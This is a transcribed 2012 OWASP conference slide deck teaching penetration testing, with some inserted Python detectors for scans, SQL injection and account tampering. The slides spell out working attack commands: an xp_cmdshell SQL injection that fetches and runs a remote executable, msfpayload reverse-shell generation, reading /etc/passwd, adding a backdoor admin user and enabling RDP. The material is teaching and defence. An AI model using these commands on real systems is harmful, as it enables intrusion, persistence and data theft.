OWASP InfoSec India Conference 2012
August 24th – 25th, 2012
Hotel Crowne Plaza, Gurgaon
The OWASP Foundation
http://www.owasp.org
http://www.owasp.in




Public exploit held private: Penetration Testing the researcher’s way

Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com




               OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
DISCLAIMER!

This presentation contains material on the evolution of a pen tester which is based solely on the perspective of the speaker and which might contradict the opinions of individuals.

All the scenarios explained here are fictional, even though they might resemble realistic situations.

Even though no harm is intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that.




Setting the context


Why Pentesting?
How do you do it?
 To VA or to PT… That’s the question.




Setting the context

 Terminologies
  Vulnerability
  Exploit
  Payload
  Reverse shell




Basics

Pentesting
  Internal
  External
  Automated -> review the report -> get the final report
  Manual -> run a few basic tools -> get the report done


Basics…

Pentesting Steps
  Recon and Scanning
  Exploit
  Maintain Access
  Clean up




Scanning
Why?
  Identify the live hosts
  OS fingerprinting
  Service fingerprinting




Scanning
Desi Jugaad
  Ping sweep / shell scripts
 Decent tools (But indecent usage)
  NMAP (behold the power of NSE)
  Others?




Desi Jugaad (Local Hack)

Ping Sweep

Windows (typed at a cmd.exe prompt; inside a .bat file the loop variable is written %%i):

FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply"

Linux:

#!/bin/bash
# One echo request per host, sent in parallel; print only the addresses that answered.
for ip in $(seq 1 254); do
  ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
done
wait   # let the background pings finish before the script exits




Scanning
Problem!
  It is taking too long to scan, need to go for lunch…
  Is it really a Windows box that just looks like a Linux box? Or which version?




Desi Jugaad
 Nmap
   nmap -sV 192.168.15.201
   nmap -O 192.168.15.201
   nmap -A 192.168.15.201
   nmap -p 1-65535 -sV 192.168.15.201
   nmap -p T:80 192.168.15.200-250
   Zenmap
 Unicornscan
   us -H -msf -Iv 192.168.13.201 -p 1-65535
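From the defender's side, the ping sweep and the port scans on the two slides above show up as one source touching many hosts, or many ports on one host, within a short window. The following is an added example, not from the deck, that detects both over constructed firewall-style log lines in an assumed '<epoch> <src> -> <dst>:<port> <proto>' format with illustrative thresholds:

```python
"""Scan detection over firewall-style logs.

Added example (not from the slides): flags the two behaviours the
"Desi Jugaad" slides produce on the wire, a ping sweep across many hosts
(the FOR /L and bash loops) and a port scan of one host
(nmap -p 1-65535 -sV 192.168.15.201).

Assumptions (constructed for this example): each log line reads
'<epoch> <src> -> <dst>:<port> <proto>', with port 0 for ICMP echo, and
the thresholds below are illustrative rather than tuned for a real network.
"""
from collections import defaultdict, deque

SWEEP_HOSTS = 10    # distinct destination hosts from one source within the window
SCAN_PORTS = 50     # distinct destination ports on one host from one source
WINDOW_SECS = 60


def parse_line(line):
    """'1345795200 10.0.0.5 -> 192.168.15.201:80 tcp' -> (ts, src, dst, port, proto)."""
    ts, src, _arrow, dst_port, proto = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return int(ts), src, dst, int(port), proto.lower()


def detect(lines, sweep_hosts=SWEEP_HOSTS, scan_ports=SCAN_PORTS, window=WINDOW_SECS):
    """Return {("sweep", src, "*"): hosts} and {("portscan", src, dst): ports}.

    The value is the largest distinct-host or distinct-port count seen for that
    source inside any window of `window` seconds, so the caller can rank findings.
    """
    events = sorted(parse_line(l) for l in lines if l.strip())
    recent = defaultdict(deque)          # per source: events inside the current window
    findings = {}
    for ts, src, dst, port, _proto in events:
        window_events = recent[src]
        window_events.append((ts, dst, port))
        while ts - window_events[0][0] > window:   # expire events older than the window
            window_events.popleft()
        hosts = {d for _, d, _ in window_events}
        if len(hosts) >= sweep_hosts:
            key = ("sweep", src, "*")
            findings[key] = max(findings.get(key, 0), len(hosts))
        ports_by_dst = defaultdict(set)
        for _, d, p in window_events:
            ports_by_dst[d].add(p)
        for d, ports in ports_by_dst.items():
            if len(ports) >= scan_ports:
                key = ("portscan", src, d)
                findings[key] = max(findings.get(key, 0), len(ports))
    return findings


def constructed_log():
    """Constructed sample: one host sweeping 20 addresses, then scanning 60
    ports on a single target, plus an ordinary client making three connections."""
    base = 1345795200                    # 2012-08-24 08:00 UTC, the conference date
    lines = [f"{base + i} 10.0.0.5 -> 192.168.153.{i + 1}:0 icmp" for i in range(20)]
    lines += [f"{base + 100 + i} 10.0.0.5 -> 192.168.15.201:{i + 1} tcp" for i in range(60)]
    lines += [f"{base + 5} 10.0.0.9 -> 192.168.15.10:443 tcp",
              f"{base + 50} 10.0.0.9 -> 192.168.15.11:80 tcp",
              f"{base + 130} 10.0.0.9 -> 192.168.15.10:443 tcp"]
    return lines


if __name__ == "__main__":
    for (kind, src, target), count in sorted(detect(constructed_log()).items()):
        print(f"{kind:8} from {src} -> {target}: {count}")
```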
Nmap Scripts

NSE scripts shipped with Nmap live in its data directory, /usr/local/share/nmap/scripts for a source install (or /usr/share/nmap/scripts from a distribution package).




Nmap Scripts

• Shared files and folders
  • nmap --script=smb-enum-shares 192.168.80.129

• Check for SMB vulnerabilities
  • nmap --script=smb-check-vulns 192.168.80.129

• Scan for machines that use the default MS SQL username/password
  • nmap --script=ms-sql-info 192.168.80.129




Scanning
I have Nessus. Why go through so much pain?
I don’t have Nessus. What do I do?




Exploit
 Motive
  To gain access
    Data
    Command execution
    Destroy everything!
 Categories
  Service level
  OS
Exploit

What to exploit?
  FTP?
  HTTP?
  SNMP?
  What else?




Exploit

 FTP
  Server Exploit – Buffer Overflow
  Fuzzing???
  Bruteforce
SNMP
  What to do?


FTP Tips
Windows (write an ftp command script, then run the client non-interactively with ftp -s:; the two "ftp" lines are the anonymous user name and password)

echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt




FTP Tips
Linux (the ftp client reads its commands from stdin; -n disables auto-login so the quote user/pass lines in the script supply the credentials)

echo quote user ftp >> ftp.txt
echo quote pass ftp >> ftp.txt
echo verbose >> ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt | ftp -n 192.168.12.124


Exploit

 HTTP
  Server Exploit
  Command Execution
  Web Shells
  SQLi




     OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)   20
HTTP




SQLi Tips

' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp -s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';--
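What makes the payload above work is string concatenation plus a database that executes stacked statements. As an added example not taken from the deck, here is the vulnerable lookup beside its parameterised fix, using an in-memory SQLite table as an assumed stand-in for the slide's MS SQL target:

```python
"""Why the stacked-query payload on the "SQLi Tips" slide works, and what stops it.

Added example (not from the slides). The payload needs two things: user input
concatenated into the SQL text, and a database that executes stacked
statements (';exec master..xp_cmdshell ...'). The lookup below uses an
in-memory SQLite table as a stand-in for the slide's MS SQL target; SQLite
has no xp_cmdshell, but the injection point and the fix are the same.
"""
import sqlite3

# Constructed, shortened form of the slide's payload: the "' or 1=1" prefix
# makes the WHERE clause true for every row; "--" comments out the closing quote.
SAMPLE_PAYLOAD = "' or 1=1--"
# Constructed stacked-statement payload in the shape of the slide's ";exec ..." chain.
STACKED_PAYLOAD = "';DROP TABLE users;--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def find_user_unsafe(conn, name):
    """Vulnerable: the caller's text is spliced into the statement and parsed as SQL."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Fixed: the value is bound as a parameter, so quotes and keywords stay data."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def stacked_statement_blocked(conn):
    """Python's sqlite3 driver refuses a second statement in one execute() call,
    so the slide's ';exec ...' chain fails here even through the vulnerable
    function. MS SQL executes the whole batch, and xp_cmdshell (disabled by
    default since SQL Server 2005) then hands each piece to cmd.exe.
    Returns True when the driver rejected the stacked statement and the table survived."""
    try:
        find_user_unsafe(conn, STACKED_PAYLOAD)
    except (sqlite3.ProgrammingError, sqlite3.Warning):   # older versions raised Warning
        rows = conn.execute("SELECT count(*) FROM users").fetchone()[0]
        return rows == 3
    return False


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", find_user_unsafe(db, SAMPLE_PAYLOAD))   # every row comes back
    print("safe:  ", find_user_safe(db, SAMPLE_PAYLOAD))     # no such user
    print("stacked statement blocked by driver:", stacked_statement_blocked(db))
```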
SQLi Tips

MySQL non-interactive (-e runs the given statements and exits)
  mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
  mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO DUMPFILE '/tmp/passwd';"


Exploit

 Metasploit
  Use Exploit
  Set payload
  exploit
 Any other options?
How about writing your own exploit (in your free time)?
  (out of scope)


L33t love story

 Exploit’s love letter to the machine
  PAYLOAD…
Which courier?
  MSF – set payload
  Custom program – msfpayload
    Bad characters
  Executable - msfpayload

Payload Generator
 meterpreter msfpayload
   options:
   ./msfpayload windows/meterpreter/reverse_tcp O

   Create exe:
   ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe

   Generate shellcode:
   ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C



From msf:
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST 192.168.1.40
 set LPORT 80
 show options
 exploit



Exploit

I am in, what to do?
  Secure access?
    Add user
    Open a port
    I like it the reverse way
    meterpreter
  Dude, did you get root/admin access?

Add User
 Windows Shell
  net user hacker hacker123 /add
  net localgroup administrators hacker /add
 Meterpreter
  use incognito
  add_user hacker hacker123
  add_localgroup_user Administrators hacker
 RDP enable
   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
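The commands on the FTP Tips, SQLi Tips and Add User slides all leave a trail in the Windows Security log. Here is an added example, not from the deck, that runs simple rules over constructed 4688/4720/4732 events in an assumed '<timestamp>|<event id>|key=value|...' line format:

```python
"""Host-side detection of the post-exploitation steps on the "FTP Tips",
"SQLi Tips" and "Add User" slides, from Windows Security log events.

Added example (not from the slides). The log lines are constructed in a
simplified '<timestamp>|<event id>|key=value|...' form; real events come
from EVTX/XML and need a proper parser first. Event IDs are the standard
ones: 4688 process creation (with command-line logging enabled), 4720 user
account created, 4732 member added to a security-enabled local group.
Patterns are illustrative, not a complete rule set.
"""
import re

CMDLINE_RULES = [
    ("scripted ftp download", re.compile(r"\bftp(\.exe)?\s+.*-s:", re.I)),
    ("local user added", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added to local Administrators",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*/add\b", re.I)),
    ("RDP enabled via registry",
     re.compile(r"\breg(\.exe)?\s+add\b.*fDenyTSConnections.*\s/d\s+0\b", re.I)),
]
# xp_cmdshell runs its commands as children of the SQL Server service process.
SQL_SERVER_PARENTS = {"sqlservr.exe"}


def parse_event(line):
    ts, event_id, *fields = line.strip().split("|")
    data = dict(field.split("=", 1) for field in fields)
    return ts, int(event_id), data


def analyse(lines):
    """Return (timestamp, finding) tuples in log order; empty for benign input."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ts, eid, data = parse_event(line)
        if eid == 4688:
            cmd = data.get("CommandLine", "")
            parent = data.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
            for label, rx in CMDLINE_RULES:
                if rx.search(cmd):
                    findings.append((ts, label))
            if parent in SQL_SERVER_PARENTS and cmd:
                findings.append((ts, "shell spawned by SQL Server (xp_cmdshell?)"))
        elif eid == 4720:
            findings.append((ts, "user account created: " + data.get("TargetUserName", "?")))
        elif eid == 4732 and data.get("TargetUserName", "").lower() == "administrators":
            findings.append((ts, "member added to Administrators: " + data.get("MemberName", "?")))
    return findings


# Constructed sample replaying the slides' commands as the host would record them.
CONSTRUCTED_LOG = [
    r"2012-08-24T10:00:01|4688|ParentProcessName=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe|CommandLine=cmd.exe /c echo open 192.168.12.124> ftpmet.txt",
    r"2012-08-24T10:00:02|4688|ParentProcessName=C:\Windows\System32\cmd.exe|CommandLine=ftp -s:ftpmet.txt",
    r"2012-08-24T10:00:05|4688|ParentProcessName=C:\Windows\System32\cmd.exe|CommandLine=net user hacker hacker123 /add",
    r"2012-08-24T10:00:05|4720|TargetUserName=hacker|SubjectUserName=SYSTEM",
    r"2012-08-24T10:00:06|4688|ParentProcessName=C:\Windows\System32\cmd.exe|CommandLine=net localgroup administrators hacker /add",
    r"2012-08-24T10:00:06|4732|TargetUserName=Administrators|MemberName=hacker",
    r'2012-08-24T10:00:08|4688|ParentProcessName=C:\Windows\System32\cmd.exe|CommandLine=reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"2012-08-24T10:01:00|4688|ParentProcessName=C:\Windows\explorer.exe|CommandLine=notepad.exe report.txt",
]

if __name__ == "__main__":
    for ts, finding in analyse(CONSTRUCTED_LOG):
        print(ts, finding)
```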

Privilege Escalation

 Categories
  Service level
  OS
Problem!
  How can I transfer my exploit there?
    Netcat
    FTP

Kernel Exploits
 Linux Kernel <= 2.6.36-rc8   http://www.exploit-db.com/exploits/15285/
 Linux Kernel 2.4/2.6   http://www.exploit-db.com/exploits/9545/
 Linux Kernel 2.6   http://www.exploit-db.com/exploits/8478/
 Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5   http://www.exploit-db.com/exploits/9844/




Windows Exploits
 Windows Vista, 7, 2008   http://www.exploit-db.com/exploits/15609/
 Windows XP, 2003   http://www.exploit-db.com/exploits/18176/
 Linux + NT priv esc   http://www.exploit-db.com/exploits/9301/
 Windows XP SP2, SP3   http://www.exploit-db.com/exploits/9301/




Pivoting…

 Huh?
Why do I need it?
How do I do it?
  nc + port forwarding
  SSH tunneling




Fuzzing…

 My favorite, but the last thing I prefer to do on my own
  Python rocks!
  Basic
  Advanced
    SEH handler
    Egg hunting shellcode

Did I miss anything?

 Questions
 Perspectives
 Comments


tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu



Thank you




tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu



                                                                           36

OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)

Weitere ähnliche Inhalte

Ähnlich wie Public exploit held private : Penetration Testing the researcher’s way

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis   lava kumarThe magic of passive web vulnerability analysis   lava kumar
The magic of passive web vulnerability analysis lava kumarowaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...owaspindia
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersJavan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFDkilroy440
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsAbhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code EverywhereMatt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowDatabricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and securityAlmudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world WebappThings Lab
 

Ähnlich wie Public exploit held private : Penetration Testing the researcher’s way (20)

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis   lava kumarThe magic of passive web vulnerability analysis   lava kumar
The magic of passive web vulnerability analysis lava kumar
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity service
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
 

Kürzlich hochgeladen

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 

Kürzlich hochgeladen (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
